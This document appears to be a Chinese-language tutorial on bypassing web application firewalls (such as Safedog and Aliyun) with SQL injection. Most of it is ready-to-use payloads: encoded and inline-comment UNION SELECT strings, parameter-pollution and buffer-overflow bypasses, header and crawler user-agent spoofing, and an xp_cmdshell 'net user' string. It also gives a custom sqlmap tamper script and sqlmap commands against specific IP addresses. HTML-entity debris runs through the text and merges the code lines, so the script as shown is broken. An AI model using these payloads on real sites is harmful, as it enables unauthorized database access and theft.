SQL注入waf绕过

举例&＃xff1a;

z.com/index.php?page_id&＃61;-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…
SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))


示例代码中&＃xff0c;前者是对单个字符十六进制编码&＃xff0c;后者则是对整个字符串编码&＃xff0c;使用上来说较少见一点

3.Unicode编码

Unicode有所谓的标准编码和非标准编码&＃xff0c;假设我们用的utf-8为标准编码&＃xff0c;那么西欧语系所使用的就是非标准编码了

看一下常用的几个符号的一些Unicode编码&＃xff1a;

单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7

空格&＃xff1a;%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0

左括号&＃xff1a;%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8

右括号&＃xff1a;%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9

举例&＃xff1a;?id&＃61;10%D6‘%20AND%201&＃61;2%23

SELECT ‘Ä’&＃61;‘A’; #1

两个示例中&＃xff0c;前者利用双字节绕过&＃xff0c;比如对单引号转义操作变成’&＃xff0c;那么就变成了%D6%5C’&＃xff0c;%D6%5C构成了一个款字节即Unicode字节&＃xff0c;单引号可以正常使用

第二个示例使用的是两种不同编码的字符的比较&＃xff0c;它们比较的结果可能是True或者False&＃xff0c;关键在于Unicode编码种类繁多&＃xff0c;基于黑名单的过滤器无法处理所以情况&＃xff0c;从而实现绕过

另外平时听得多一点的可能是utf-7的绕过&＃xff0c;还有utf-16、utf-32的绕过&＃xff0c;后者从成功的实现对google的绕过&＃xff0c;有兴趣的朋友可以去了解下

常见的编码当然还有二进制、八进制&＃xff0c;它们不一定都派得上用场&＃xff0c;但后面会提到使用二进制的例子

• 使用注释

  看一下常见的用于注释的符号有哪些&＃xff1a;*//, – , /**/, #, --&＃43;,-- -, ;

  1.普通注释

  举例&＃xff1a;

  http://xxx:xxx/Less-2/?id&＃61;-11 union select 1,database()/**/,3 --&＃43;


  /**/在构造得查询语句中插入注释&＃xff0c;规避对空格的依赖或关键字识别;#、–&＃43;用于终结语句的查询

  2.内联注释

  相比普通注释&＃xff0c;内联注释用的更多&＃xff0c;它有一个特性/!**/只有MySQL能识别

  举例&＃xff1a;

  index.php?page_id&＃61;-15 /*!UNION*/ /*!SELECT*/ 1,2,3
?page_id&＃61;null%0A/**//*****!50000%55nIOn*****//*****yoyu*****/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/&＃43;1,2,3,4…


  两个示例中前者使用内联注释&＃xff0c;后者还用到了普通注释。使用注释一个很有用的做法便是对关键字的拆分&＃xff0c;要做到这一点后面讨论的特殊符号也能实现&＃xff0c;当然前提是包括/、*在内的这些字符能正常使用

• 等价函数与命令

  有些函数或命令因其关键字被检测出来而无法使用&＃xff0c;但是在很多情况下可以使用与之等价或类似的代码替代其使用

  1.函数或变量

  hex()、bin() &＃61;&＃61;> ascii()
sleep() &＃61;&＃61;>benchmark()
concat_ws()&＃61;&＃61;>group_concat()
mid()、substr() &＃61;&＃61;> substring()
&＃64;[&＃64;user ]() &＃61;&＃61;> user()
&＃64;[&＃64;datadir ]() &＃61;&＃61;> datadir()

  举例&＃xff1a;substring()和substr()无法使用时&＃xff1a;?

  id&＃61;1&＃43;and&＃43;ascii(lower(mid((select&＃43;pwd&＃43;from&＃43;users&＃43;limit&＃43;1,1),1,1)))&＃61;74
或者&＃xff1a;substr((select &＃39;password&＃39;),1,1) &＃61; 0x70
strcmp(left(&＃39;password&＃39;,1), 0x69) &＃61; 1
strcmp(left(&＃39;password&＃39;,1), 0x70) &＃61; 0
strcmp(left(&＃39;password&＃39;,1), 0x71) &＃61; -1


  上述这几个示例用于说明有时候当某个函数不能使用时&＃xff0c;还可以找到其他的函数替代其实现&＃xff0c;至于select、uinon、where等关键字被限制如何处理将在后面filter部分讨论

  2.符号

  and和or有可能不能使用&＃xff0c;或者可以试下&&和||能不能用&＃xff1b;还有&＃61;不能使用的情况&＃xff0c;可以考虑尝试<、>&＃xff0c;因为如果不小于又不大于&＃xff0c;那边是等于了

  在看一下用得多的空格&＃xff0c;可以使用如下符号表示其作用&＃xff1a;%20 %09 %0a %0b %0c %0d %a0 /**/

  3.生僻函数

  MySQL/PostgreSQL支持XML函数&＃xff1a;

  Select UpdateXML(‘ ’,’/script/&＃64;x/’,’src&＃61;//evil.com’);?id&＃61;1 and 1&＃61;(updatexml(1,concat(0x3a,(select user())),1))SELECT xmlelement(name img,xmlattributes(1as src,&＃39;a\l\x65rt(1)&＃39;as \117n\x65rror));　//postgresql?id&＃61;1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

  MySQL、PostgreSQL、Oracle它们都有许多自己的函数&＃xff0c;基于黑名单的filter要想涵盖这么多东西从实际上来说不太可能&＃xff0c;而且代价太大&＃xff0c;看来黑名单技术到一定程度便遇到了限制

• 特殊符号

  这里我把非字母数字的字符都规在了特殊符号一类&＃xff0c;特殊符号有特殊的含义和用法&＃xff0c;涉及信息量比前面提到的几种都要多

  先看下乌云drops上“waf的绕过技巧”一文使用的几个例子&＃xff1a;

  1.使用反引号&＃xff0c;例如selectversion()&＃96;&＃xff0c;可以用来过空格和正则&＃xff0c;特殊情况下还可以将其做注释符用

  2.神奇的"-&＃43;."&＃xff0c;select&＃43;id-1&＃43;1.from users; “&＃43;”是用于字符串连接的&＃xff0c;”-”和”.”在此也用于连接&＃xff0c;可以逃过空格和关键字过滤

  3.&＃64;符号&＃xff0c;select&＃64;^1.from users; &＃64;用于变量定义如**&＃64;**var_name&＃xff0c;一个&＃64;表示用户定义&＃xff0c;&＃64;&＃64;表示系统变量

  4.Mysql function() as xxx 也可不用as和空格　　 select-count(id)test from users; //绕过空格限制

  可见&＃xff0c;使用这些字符的确是能做很多事&＃xff0c;也证实了那句老话&＃xff0c;只有想不到&＃xff0c;没有做不到

  本人搜罗了部分可能发挥大作用的字符(未包括’、*、/等在内&＃xff0c;考虑到前面已经出现较多次了)&＃xff1a;&＃96;、~、!、&＃64;、%、()、[]、.、-、&＃43; 、|、%00

  举例&＃xff1a;

  关键字拆分&＃xff1a;‘se’&＃43;’lec’&＃43;’t’

  %S%E%L%E%C%T 1

  1.aspx?d&＃61;1;EXEC(‘ma’&＃43;&＃39;ster…x’&＃43;&＃39;p_cm’&＃43;&＃39;dsh’&＃43;&＃39;ell ”net user”’)

  !和()&＃xff1a;’ or --&＃43;2&＃61;- -!!!&＃39;2

  id&＃61;1&＃43;(UnI)(oN)&＃43;(SeL)(EcT)　//另 Access中,”[]”用于表和列,”()”用于数值也可以做分隔

  本节最后在给出一些和这些字符多少有点关系的操作符供参考&＃xff1a;

  >>, <<, >&＃61;, <&＃61;, <>,<&＃61;>,XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN

  使用这些"特殊符号"实现绕过是一件很细微的事情&＃xff0c;一方面各家数据库对有效符号的处理是不一样的&＃xff0c;另一方面你得充分了解这些符号的特性和使用方法才能作为绕过手段

• HTTP参数控制 (http参数污染)

  在与服务器进行交互的过程中&＃xff0c;客户端往往会在GET/POST请求中带上参数。通常在一个请求中&＃xff0c;同名参数只会出现一次&＃xff0c;但是在HTTP协议中是允许同名参数多次出现的。

  以上图服务器为例假设请求为index.php?id&＃61;1&id&＃61;2&＃xff0c;客户端请求首先通过tomcat解析第一个参数&＃xff0c;接下来tomcat去请求apache服务器&＃xff0c;而apache解析最后一个参数。实际提供服务的是apache服务器&＃xff0c;因此返回客户端的是id&＃61;2。

比如在php/apache中:

利用&＃xff1a;

mysql> /*!select database()*/;
&＃43;------------&＃43;
| database() |
&＃43;------------&＃43;
| security |
&＃43;------------&＃43;
1 row in set (0.00 sec)访问&＃xff1a;xxx:xxx/?id&＃61;1/**&id&＃61;-1 union select 1,2,3#*/ xxx:xxx/?id&＃61;1/**&id&＃61;-1%20union%20select%201,2,3%23*/


这个语句在mysql中可以正常执行

mysql> select * from users where id&＃61;1/**id&＃61;-1 union select 1,2,3#*/;
&＃43;----&＃43;----------&＃43;----------&＃43;
| id | username | password |
&＃43;----&＃43;----------&＃43;----------&＃43;
| 1 | Dumb | Dumb |
&＃43;----&＃43;----------&＃43;----------&＃43;
1 row in set (0.00 sec)

在游览器中这里是php页面所以接受的是后面的 id&＃61;-1 union select 1,2,3

安全狗这里接收到

/**&id&＃61;-1 union select 1,2,3#*/ /** */ :相当注释符 内联注释
mysql> /**select dababase()*/;
ERROR:
No query specified
这里提示没有执行语句 安全狗对这个没有执行语句没有拦截&＃xff0c;而游览器接收到真实的数据&＃xff1a;
-1 union select 1,2,3#*/ 进行注入


• 缓冲区溢出

  缓冲区溢出用于对付WAF&＃xff0c;有不少WAF是C语言写的&＃xff0c;而C语言自身没有缓冲区保护机制&＃xff0c;因此如果WAF在处理测试向量时超出了其缓冲区长度&＃xff0c;就会引发bug从而实现绕过

  举例&＃xff1a;

  ?id&＃61;1 and (select 1)&＃61;(elect 0xA*1000)&＃43;UnIoN&＃43;SeLeCT&＃43;1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26


  示例0xA*1000指0xA后面”A"重复1000次&＃xff0c;一般来说对应用软件构成缓冲区溢出都需要较大的测试长度&＃xff0c;这里1000只做参考&＃xff0c;在某些情况下可能不需要这么长也能溢出

• 整合绕过

  整合的意思是结合使用前面谈到的各种绕过技术&＃xff0c;单一的技术可能无法绕过过滤机制&＃xff0c;但是多种技术的配合使用成功的可能性就会增加不少了。这一方面来说是总体与局部和的关系&＃xff0c;另一方面则是多种技术的使用创造了更多的可能性&＃xff0c;除非每一种技术单独都无法使用&＃xff0c;否则它们能产生比自身大得多的能量。

  举例&＃xff1a;

  z.com/index.php?page_id&＃61;-15&＃43;and&＃43;(select 1)&＃61;(Select 0xAA[..(add about 1000 "A")..])&＃43;/*!uNIOn*/&＃43;/*!SeLECt*/&＃43;1,2,3,4…id&＃61;1/*!UnIoN*/&＃43;SeLeCT&＃43;1,2,concat(/*!table_name*/)&＃43;FrOM /*information_schema*/.tables /*!WHERE */&＃43;/*!TaBlE_ScHeMa*/&＃43;like&＃43;database()– -?id&＃61;-725&＃43;/*!UNION*/&＃43;/*!SELECT*/&＃43;1,GrOUp_COnCaT(COLUMN_NAME),3,4,5&＃43;FROM&＃43;/*!INFORMATION_SCHEM*/.COLUMNS&＃43;WHERE&＃43;TABLE_NAME&＃61;0x41646d696e--


案例演示

• 简要其他绕过方式学习
• FUZZ绕过脚本结合编写测试
• 阿里云盾防SQL注入简要分析
• 安全狗&＃43;云盾SQL注入插件脚本编写

%23x%20union%23x%0Aselect%201,2,3%20union%20/*!44509select*/%201,2,3
%20/*!44509union*/%23x%0aselect%201,1,2,3
这个/*!44509union*/是mysql数据库的特性&＃xff1a;表示数据库版本在4.4.509以上的话就可以被执行。而waf会略过id&＃61;1/**&id&＃61;-1%20union%20select%201,2,3%23*/
%20union%20all%23%0a%20select%201,2,3%23


方式一:IP白名单

从网络层获取的ip&＃xff0c;这种一般伪造不来&＃xff0c;如果是获取客户端的IP&＃xff0c;这样就可能存在伪造Ip绕过的情况。需要条件比较苛刻

测试方法:修改http的header来bypass waf

x-forwarded-for
x-remote-IP
x-originating-IP
x-remote-addr
x-Real-ip


方式二:静态资源

特定的静态资源后缀请求&＃xff0c;常见的静态文件(.js .jpg .swf .css等等)&＃xff0c;类似白名单机制,waf为了检测效率&＃xff0c;不去检测这样一些静态文件名后缀的请求。现在一般都会拦截

http://10.s.9.201/sql.php ?id&＃61;1
http://10.9.9.201/sql.php/1.js&＃61;?id&＃61;1


备注: aapx/php只识别到前面的.aspx/ .php后面基本不识

方式三:url白名单

为了防止误拦&＃xff0c;部分waf内置默认的白名单列表&＃xff0c;如acmin/managerl system等管理后台。只要url中存在白名单的字符串&＃xff0c;就作为白名单不进行检测。常见的uzl构造姿势:

http://10.s.s.201/&＃61;ql.php/admin.php?id&＃61;1
http://10.9.9.201/sql.php?a&＃61;/manage/&b&＃61;../etc/passwd
http://10.9.s.201/../../../manage/../sql.asp?id&＃61;2


waf通过/manage/"进行比较&＃xff0c;只要uri中存在/manage/就作为白名单不进行检测&＃xff0c;这样我们可以通过/sql.php?a&＃61;/ manage/&b&＃61;…/etc/passwcl绕过防御规则。

方式四:爬虫白名单

在爬虫脚本的请求头中加入官方爬虫比如百度爬虫等白名单的header&＃xff0c;waf就不会对你的ip进行封禁

Mozilla/5.0 (compatible; Baiduspider/2.0; &＃43;http://www.baidu.com/search/spider.html)


搜索引擎蜘蛛爬虫 User Agent 一览

https://www.cnblogs.com/junsec/p/11607603.html

在tamper文件夹中创建rdog.py

#!/usr/bin/env python"""
Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file &＃39;LICENSE&＃39; for copying permission
"""import refrom lib.core.data import kb
from lib.core.enums import PRIORITY__priority__ &＃61; PRIORITY.NORMALdef dependencies():passdef tamper(payload, **kwargs):retVal &＃61; payloadif payload:retVal &＃61; retVal.replace(&＃39;UNION&＃39;, &＃39;uNiOn/*/%0a*a*/&＃39;)retVal &＃61; retVal.replace(&＃39;DATABASE()&＃39;, &＃39;dataBase/*!(*/)&＃39;)retVal &＃61; retVal.replace(&＃39;DATABASE()&＃39;, &＃39;dataBase%23a%0a&＃39;)retVal &＃61; retVal.replace(&＃39;USER()&＃39;, &＃39;usEr/*!(*/)&＃39;)retVal &＃61; retVal.replace(&＃39; &＃39;, &＃39;/**/&＃39;)retVal &＃61; retVal.replace(" ", &＃39;%23a%0a&＃39;)retVal &＃61; retVal.replace(&＃39;OR&＃39;, &＃39;/*!14400Or*/&＃39;)retVal &＃61; retVal.replace(&＃39;AND&＃39;, &＃39;/*!14400aNd*/&＃39;)return retVal


可以看到的是代码并没有按照我们预期执行&＃xff0c;我们添加代理看看到底是个什么情况

python sqlmap.py -u "http://10.1.1.120/Less-2/?id&＃61;1" --tamper&＃61;rdog.py --proxy&＃61;http://127.0.0.1:8888启动burp

可以看到user-agent是sqlmap/1.5.6.4#dev (http://sqlmap.org)&＃xff0c;安全软件当中是禁止使用这种脚本客户端所以就被拦截&＃xff0c;自然插件脚本也就没办法正常执行

python sqlmap.py -u "http://10.1.1.120/Less-2/?id&＃61;1" --tamper&＃61;rdog.py --proxy&＃61;http://127.0.0.1:8888 --random-angent 加上–random-angent 这个是在sqlmap的游览器头储存文件中随机取一个

备注&＃xff1a;在真实环境当中waf可能会配置流量访问也就是说你访问的速度过快会将你访问的ip拉入黑名单&＃xff0c;对此我们使用的策略是延时&＃xff0c;代理&＃xff0c;爬虫白名单

搜索引擎爬虫user-agent信息&＃xff1a;https://blog.csdn.net/liuxl57805678/article/details/89378720

自定义user-agent

python sqlmap.py -u "http://10.1.1.120/Less-2/?id&＃61;1" --tamper&＃61;rdog.py --proxy&＃61;http://10.1.1.2:8888 --user-agent&＃61;"Mozilla/5.0 (compatible; Baiduspider/2.0; &＃43;http://www.baidu.com/search/spider.html)"


延时注入

–delay 时间&＃xff08;默认为秒&＃xff09;

C:\Users\admin\Desktop\security\software\sqlmapproject-sqlmap-7c41967>python sqlmap.py -u "http://1.12.250.218/Less-2/?id&＃61;1" --tamper&＃61;rdog.py --proxy&＃61;http://127.0.0.1:8888 --delay 1_____H_____ ___[&＃39;]_____ ___ ___ {1.5.6.4#dev}
|_ -| . [)] | .&＃39;| . |
|___|_ [)]_|_|_|__,| _||_|V... |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user&＃39;s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting &＃64; 17:28:14 /2021-07-27/[17:28:16] [INFO] loading tamper module &＃39;rdog&＃39;